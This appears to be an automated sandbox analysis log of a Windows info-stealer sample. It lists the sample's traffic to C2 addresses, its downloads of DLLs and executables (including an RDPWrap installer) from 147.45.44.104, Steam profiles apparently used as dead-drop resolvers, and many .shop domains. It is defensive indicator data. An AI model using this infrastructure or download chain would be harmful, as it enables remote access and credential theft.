                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: unknownTCP traffic detected without corresponding DNS query: 5.75.211.162
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 2_2_00406963 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle,2_2_00406963
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /freebl3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /mozglue.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /msvcp140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /softokn3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /vcruntime140.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /nss3.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199724331900 HTTP/1.1Connection: Keep-AliveUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Host: steamcommunity.com
                                Source: global trafficHTTP traffic detected: GET /profiles/76561199780418869 HTTP/1.1Host: steamcommunity.comConnection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /sqlp.dll HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Connection: Keep-AliveCache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f5dbaca34ac_lfdnsafnds.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f5db9e54794_vfkagks.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f5d9ab0d4c7_rdp.exe HTTP/1.1User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 147.45.44.104Cache-Control: no-cache
                                Source: global trafficHTTP traffic detected: GET /prog/66f55533ca7d6_RDPWInst.exe HTTP/1.1Host: 147.45.44.104Connection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.orgConnection: Keep-Alive
                                Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: api.ipify.org
                                Source: RegAsm.exe, 00000008.00000002.2501224995.0000000000CCE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: Content-Security-Policy: default-src blob: data: https: 'unsafe-inline' 'unsafe-eval'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://community.akamai.steamstatic.com/ https://cdn.akamai.steamstatic.com/steamcommunity/public/assets/ https://api.steampowered.com/ https://recaptcha.net https://www.google.com/recaptcha/ https://www.gstatic.cn/recaptcha/ https://www.gstatic.com/recaptcha/ https://www.youtube.com/ https://s.ytimg.com; object-src 'none'; connect-src 'self' https://community.akamai.steamstatic.com/ https://store.steampowered.com/ h equals www.youtube.com (Youtube)
                                Source: global trafficDNS traffic detected: DNS query: steamcommunity.com
                                Source: global trafficDNS traffic detected: DNS query: wallkedsleeoi.shop
                                Source: global trafficDNS traffic detected: DNS query: gutterydhowi.shop
                                Source: global trafficDNS traffic detected: DNS query: ghostreedmnu.shop
                                Source: global trafficDNS traffic detected: DNS query: offensivedzvju.shop
                                Source: global trafficDNS traffic detected: DNS query: vozmeatillu.shop
                                Source: global trafficDNS traffic detected: DNS query: drawzhotdog.shop
                                Source: global trafficDNS traffic detected: DNS query: fragnantbui.shop
                                Source: global trafficDNS traffic detected: DNS query: stogeneratmns.shop
                                Source: global trafficDNS traffic detected: DNS query: cowod.hopto.org
                                Source: global trafficDNS traffic detected: DNS query: reinforcenh.shop
                                Source: global trafficDNS traffic detected: DNS query: ballotnwu.site
                                Source: global trafficDNS traffic detected: DNS query: api.ipify.org
                                Source: global trafficDNS traffic detected: DNS query: hansgborn.eu
                                Source: unknownHTTP traffic detected: POST / HTTP/1.1Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0Host: 5.75.211.162Content-Length: 256Connection: Keep-AliveCache-Control: no-cache
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: Http://cowod.hopto.orgJDB
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f55533ca7d6_RDPWInst.exe
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007CB000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f5d9ab0d4c7_rdp.exe
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exe
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exem-data;
                                Source: RegAsm.exe, 00000002.00000002.2452955008.000000000097A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f5db9e54794_vfkagks.exex
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2452955008.00000000007DD000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exe1kkkk1220577http://147.45.44.104/prog/66f5db9e
                                Source: RegAsm.exe, 00000002.00000002.2449321753.00000000005A1000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://147.45.44.104/prog/66f5dbaca34ac_lfdnsafnds.exeata;
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://aia.entrust.net/ts1-chain256.cer01
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.org/
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033B1000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmp, AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://api.ipify.orgd
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.BKJJKFIEHJDB
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.IEHJDB
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org
                                Source: RegAsm.exe, 00000002.00000002.2452955008.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/
                                Source: RegAsm.exe, 00000002.00000002.2452955008.0000000000898000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org/s
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.orgJDB
                                Source: file.exe, 00000000.00000002.1732259404.0000000003D45000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.0000000000400000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hopto.org_DEBUG.zip/c
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://cowod.hoptoFIEHJDB
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://crl.entrust.net/2048ca.crl0
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://crl.entrust.net/ts1ca.crl0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl07
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0K
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eu
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.00000000033C5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://hansgborn.eud
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, file.exe, freebl3.dll.2.dr, 66f5db9e54794_vfkagks[1].exe.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, GIIIIJDHJE.exe.2.dr, nss3.dll.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://ocsp.digicert.com0A
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0C
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0N
                                Source: RegAsm.exe, 00000002.00000002.2490924710.0000000025D02000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2510766447.0000000031BEE000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2530480824.000000003DACD000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2486690771.000000001FD91000.00000004.00000020.00020000.00000000.sdmp, freebl3.dll.2.dr, softokn3.dll.2.dr, mozglue.dll.2.dr, nss3.dll.2.drString found in binary or memory: http://ocsp.digicert.com0X
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://ocsp.entrust.net02
                                Source: file.exe, 66f5db9e54794_vfkagks[1].exe.2.dr, GIIIIJDHJE.exe.2.dr, IDBAFHDGDG.exe.2.dr, 66f5dbaca34ac_lfdnsafnds[1].exe.2.drString found in binary or memory: http://ocsp.entrust.net03
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653231961.0000000002E00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653231961.0000000002E00000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.0000000002F51000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                                Source: RDPWInst.exe, 00000013.00000000.2436607215.0000000000401000.00000020.00000001.01000000.0000000F.sdmp, RDPWInst.exe.12.drString found in binary or memory: http://stascorp.com/load/1-1-0-62
                                Source: AFHDGDGIID.exe, 0000000C.00000002.2653462111.000000000301A000.00000004.00000800.00020000.00000000.sdmp, RDPWInst.exe, 00000013.00000002.2487798844.0000000000450000.00000002.00000001.01000000.0000000F.sdmp, rdpwrap.dll.19.dr, RDPWInst.exe.12.drString found in binary or memory: http://stascorp.comDVarFileInfo$
                                Source: RegAsm.exe, 00000002.00000002.2452955008.00000000007EC000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: http://store.steampowered.com/account/cookiepreferences/
                                Source: RegAsm.exe, 00000002.00000002.2449321753.000000000046B000.00000040.00000400.00020000.00000000.sdmp, RegAsm.exe, 00000008.00000002.2501224995.0000000000D5B000.00000004.00000020.00020000.00000000.sdmp, RegAsm.exe, 0000000B.00000002.2823050611.0000000000D2B000.00000004.00000020.00020000.00000000.sdmp, 76561199780418869[1].htm.11.dr, 76561199780418869[1].htm.2.drString found in binary or memory: http://store.steampowered.com/privacy_agreement/
